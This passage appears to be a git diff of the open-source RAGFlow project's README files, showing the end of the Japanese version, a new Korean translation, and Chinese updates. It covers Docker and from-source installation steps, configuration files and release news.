</a>
</div>

<p align="center">
<a href="./README.md">English</a> |
<a href="./README_zh.md">简体中文</a> |
<a href="./README_ja.md">日本語</a> |
<a href="./README_ko.md">한국어</a>
</p>

<p align="center">
<a href="https://github.com/infiniflow/ragflow/releases/latest">
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
</a>
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.11.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

## 💡 RAGFlow とは?

[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンです。LLM(大規模言語モデル)と組み合わせることで、様々な複雑なフォーマットのデータから、根拠のある引用に裏打ちされた信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。

## 🎮 Demo

デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>

## 🔥 最新情報

- 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
- 2024-09-09 エージェントに医療相談テンプレートを追加しました。
- 2024-08-22 RAG による自然言語から SQL 文への変換(Text2SQL)をサポートします。
- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインドマップをサポートします。
- 2024-07-23 音声ファイルの解析をサポートしました。
- 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポートします。
- 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。

## 🌟 主な特徴

### 🍭 **"Quality in, quality out"**

- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
- 無限のトークンから"干し草の山の中の針"を見つける。

### 🍱 **テンプレートベースのチャンク化**

- 知的で解釈しやすい。
- テンプレートオプションが豊富。

### 🌱 **ハルシネーションが軽減された根拠のある引用**

- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。

### 🍔 **多様なデータソースとの互換性**

- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。

### 🛀 **自動化された楽な RAG ワークフロー**

- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
- カスタマイズ可能な LLM とエンベッディングモデル。
- 複数の想起と融合された再ランク付け。
- 直感的な API によってビジネスとの統合がシームレスに。

## 🔎 システム構成

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>

## 🎬 初期設定

### 📝 必要条件

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。

### 🚀 サーバーを起動

1. `vm.max_map_count` >= 262144 であることを確認する:

> `vm.max_map_count` の値をチェックするには:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> `vm.max_map_count` が 262144 以上でなければリセットする。
>
> ```bash
> # In this case, we set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
>
> ```bash
> vm.max_map_count=262144
> ```

2. リポジトリをクローンする:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```

3. ビルド済みの Docker イメージをダウンロードし、サーバーを起動する:

```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

> 上記のコマンドを実行すると、RAGFlow の開発版 Docker イメージが自動的にダウンロードされます。特定のバージョンの Docker イメージをダウンロードして実行したい場合は、docker/.env ファイルの RAGFLOW_VERSION 変数を見つけて対応するバージョンに変更してください。例えば RAGFLOW_VERSION=v0.11.0 として、上記のコマンドを実行してください。

> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。

4. サーバーを立ち上げた後、サーバーの状態を確認する:

```bash
$ docker logs -f ragflow-server
```

_以下の出力は、システムが正常に起動したことを確認するものです:_

```bash
        ____                 ______ __
       / __ \ ____ _ ____ _ / ____// /____  _      __
      / /_/ // __ `// __ `// /_   / // __ \| | /| / /
     / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
    /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
                  /____/

 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:9380
 * Running on http://x.x.x.x:9380
INFO:werkzeug:Press CTRL+C to quit
```
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。

5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。

> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。

_これで初期設定完了!ショーの開幕です!_

## 🔧 コンフィグ

システムコンフィグに関しては、以下のファイルを管理する必要があります:

- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存しています。

[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。

> [./docker/README](./docker/README.md) には環境設定とサービスコンフィグの詳細な説明があります。そこに記載されている全ての環境設定が、[service_conf.yaml](./docker/service_conf.yaml) の対応するコンフィグと一致していることを必ず確認してください。
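
> 次の Python スケッチは、`docker/.env` と `conf/service_conf.yaml` の対応する値が一致しているかを機械的に確認する一例です。あくまで仮定に基づく例示であり、`MYSQL_PASSWORD` や `mysql.password` といったキー名・構造は、実際のファイルに合わせて読み替えてください。

```python
# 設定の一貫性チェックの最小スケッチ(例示目的。キー名は仮定です)
import yaml  # pip install pyyaml


def load_env(path):
    """docker/.env を KEY=VALUE の辞書として読み込む。"""
    env = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            env[key] = value
    return env


env = load_env("docker/.env")
with open("conf/service_conf.yaml") as f:
    conf = yaml.safe_load(f)

# 例: MySQL のパスワードが両ファイルで一致しているか確認する
expected = env.get("MYSQL_PASSWORD")
actual = str(conf.get("mysql", {}).get("password", ""))
print("OK" if expected == actual else f"MISMATCH: .env={expected} yaml={actual}")
```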

デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。

> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
>
> ```bash
> $ docker-compose up -d
> ```

## 🛠️ ソースからビルドする

ソースから Docker イメージをビルドするには:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.11.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

## 🛠️ ソースコードからサービスを起動する方法

ソースコードからサービスを起動する場合は、以下の手順に従ってください:

1. リポジトリをクローンします
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```

2. 仮想環境を作成します(Anaconda または Miniconda がインストールされていることを確認してください)
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
CUDA のバージョンが 12.0 以上の場合、以下の追加コマンドを実行してください:
```bash
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```

3. エントリースクリプトをコピーし、環境変数を設定します
```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```
以下のコマンドで Python のパスと ragflow プロジェクトのパスを取得します:
```bash
$ which python
$ pwd
```

`which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。

`LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。

```bash
# 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
# オプション:Hugging Face ミラーを追加
export HF_ENDPOINT=https://hf-mirror.com
```

4. 基本サービスを起動します
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```

5. 設定ファイルを確認します

**docker/.env** 内の設定が **conf/service_conf.yaml** 内の設定と一致していることを確認してください。**service_conf.yaml** 内の関連サービスの IP アドレスとポートは、ローカルマシンの IP アドレスとコンテナが公開するポートに変更する必要があります。

6. サービスを起動します
```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```

## 📚 ドキュメンテーション

- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 ロードマップ

[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照

## 🏄 コミュニティ

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 コントリビュート

RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md) をご覧ください。

325 README_ko.md (new file)
@@ -0,0 +1,325 @@
<div align="center">
<a href="https://demo.ragflow.io/">
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
</a>
</div>

<p align="center">
<a href="./README.md">English</a> |
<a href="./README_zh.md">简体中文</a> |
<a href="./README_ja.md">日本語</a> |
<a href="./README_ko.md">한국어</a>
</p>

<p align="center">
<a href="https://github.com/infiniflow/ragflow/releases/latest">
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
</a>
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

## 💡 RAGFlow란?

[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.

## 🎮 데모
데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>

## 🔥 업데이트

- 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.

- 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.

- 2024-08-22 RAG를 통한 자연어-SQL 변환(Text2SQL)을 지원합니다.

- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag)에서 영감을 받은 GraphRAG와 마인드맵을 지원합니다.

- 2024-07-23 오디오 파일 분석을 지원합니다.

- 2024-07-08 [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.

- 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.

- 2024-05-23 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.

## 🌟 주요 기능

### 🍭 **"Quality in, quality out"**
- [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
- 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.

### 🍱 **템플릿 기반의 chunking**
- 똑똑하고 설명 가능한 방식.
- 다양한 템플릿 옵션을 제공합니다.

### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
- 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
- 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.

### 🍔 **다른 종류의 데이터 소스와의 호환성**
- 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.

### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
- 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
- 구성 가능한 LLM 및 임베딩 모델.
- 다중 검색과 결합된 re-ranking.
- 비즈니스와 원활하게 통합할 수 있는 직관적인 API.

## 🔎 시스템 아키텍처

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>

## 🎬 시작하기
### 📝 사전 준비 사항
- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.

### 🚀 서버 시작하기

1. `vm.max_map_count`가 262144 이상인지 확인하세요:
> `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> 만약 `vm.max_map_count`가 262144보다 작다면 값을 재설정하세요.
>
> ```bash
> # 이 경우에 262144로 설정했습니다:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
>
> ```bash
> vm.max_map_count=262144
> ```

2. 레포지토리를 클론하세요:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```

3. 미리 빌드된 Docker 이미지를 내려받아 서버를 시작하세요:

> 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 버전의 Docker 이미지를 다운로드하여 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전(예: `RAGFLOW_VERSION=v0.11.0`)으로 변경한 뒤, 다음 명령어를 실행하세요.
```bash
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

> 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.

4. 서버가 시작된 후 서버 상태를 확인하세요:

```bash
$ docker logs -f ragflow-server
```

_다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_

```bash
        ____                 ______ __
       / __ \ ____ _ ____ _ / ____// /____  _      __
      / /_/ // __ `// __ `// /_   / // __ \| | /| / /
     / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
    /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
                  /____/

 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:9380
 * Running on http://x.x.x.x:9380
INFO:werkzeug:Press CTRL+C to quit
```
> 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.

5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
> 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
> 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.

_이제 쇼가 시작됩니다!_

## 🔧 설정

시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:

- [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
- [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
- [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.

[.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.

> [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.

기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.

> 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
>
> ```bash
> $ docker-compose up -d
> ```

## 🛠️ 소스에서 빌드하기

Docker 이미지를 소스에서 빌드하려면:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:dev .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
```

## 🛠️ 소스에서 서비스 시작하기

서비스를 소스에서 시작하려면:

1. 레포지토리를 클론하세요:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```

2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```

```bash
# CUDA 버전이 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```

3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
```bash
# 파이썬 경로를 받아옵니다:
$ which python
# RAGFlow 프로젝트 경로를 받아옵니다:
$ pwd
```

```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
```

```bash
# 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
# - `which python`의 결과를 `PY`에 할당합니다.
# - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
# - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
# - 선택 사항: Hugging Face 미러 추가.
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
export HF_ENDPOINT=https://hf-mirror.com
```

4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
```

5. 설정 파일에서 다음 사항을 확인하세요:
- **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
- **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.

6. RAGFlow 백엔드 서비스를 시작합니다:

```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```

7. 프론트엔드 서비스를 시작합니다:

```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
$ npm run dev
```

8. 프론트엔드 서비스를 배포합니다:

```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ umi build
$ mkdir -p /ragflow/web
$ cp -r dist /ragflow/web
$ apt install nginx -y
$ cp ../docker/nginx/proxy.conf /etc/nginx
$ cp ../docker/nginx/nginx.conf /etc/nginx
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
$ systemctl start nginx
```

## 📚 문서

- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 로드맵

[RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)를 확인하세요.

## 🏄 커뮤니티

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 컨트리뷰션

RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.

92 README_zh.md
@@ -7,7 +7,8 @@
<p align="center">
<a href="./README.md">English</a> |
<a href="./README_zh.md">简体中文</a> |
<a href="./README_ja.md">日本語</a>
<a href="./README_ja.md">日本語</a> |
<a href="./README_ko.md">한국어</a>
</p>

<p align="center">
@@ -17,29 +18,43 @@
<a href="https://demo.ragflow.io" target="_blank">
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen"
alt="docker pull infiniflow/ragflow:v0.6.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
</a>
</p>

<h4 align="center">
<a href="https://ragflow.io/docs/dev/">Document</a> |
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
<a href="https://twitter.com/infiniflowai">Twitter</a> |
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
<a href="https://demo.ragflow.io">Demo</a>
</h4>

## 💡 RAGFlow 是什么?

[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。

## 📌 近期更新
## 🎮 Demo 试用

- 2024-05-21 支持流式结果输出和文本块获取API。
- 2024-05-15 集成大模型 OpenAI GPT-4o。
- 2024-05-08 集成大模型 DeepSeek。
- 2024-04-26 增添了'文件管理'功能。
- 2024-04-19 支持对话 API ([更多](./docs/conversation_api.md))。
- 2024-04-16 集成嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 和 专为轻型和高速嵌入而设计的 [FastEmbed](https://github.com/qdrant/fastembed)。
- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
- 2024-04-07 支持中文界面。
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
</div>

## 🔥 近期更新

- 2024-09-13 增加知识库问答搜索模式。
- 2024-09-09 在 Agent 中加入医疗问诊模板。
- 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
- 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
- 2024-07-23 支持解析音频文件。
- 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。

## 🌟 主要功能

@@ -60,7 +75,7 @@

### 🍔 **兼容各类异构数据源**

- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。

### 🛀 **全程无忧、自动化的 RAG 工作流**

@@ -87,7 +102,7 @@

### 🚀 启动服务器

1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】:
1. 确保 `vm.max_map_count` 不小于 262144:

> 如需确认 `vm.max_map_count` 的大小:
>
@@ -122,7 +137,7 @@
$ docker compose -f docker-compose-CN.yml up -d
```

> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.6.0,然后运行上述命令。
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。

> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。

@@ -147,13 +162,13 @@
* Running on http://x.x.x.x:9380
INFO:werkzeug:Press CTRL+C to quit
```
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anomaly` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。

5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。

> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。

_好戏开始,接着奏乐接着舞!_

@@ -184,7 +199,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.6.0 .
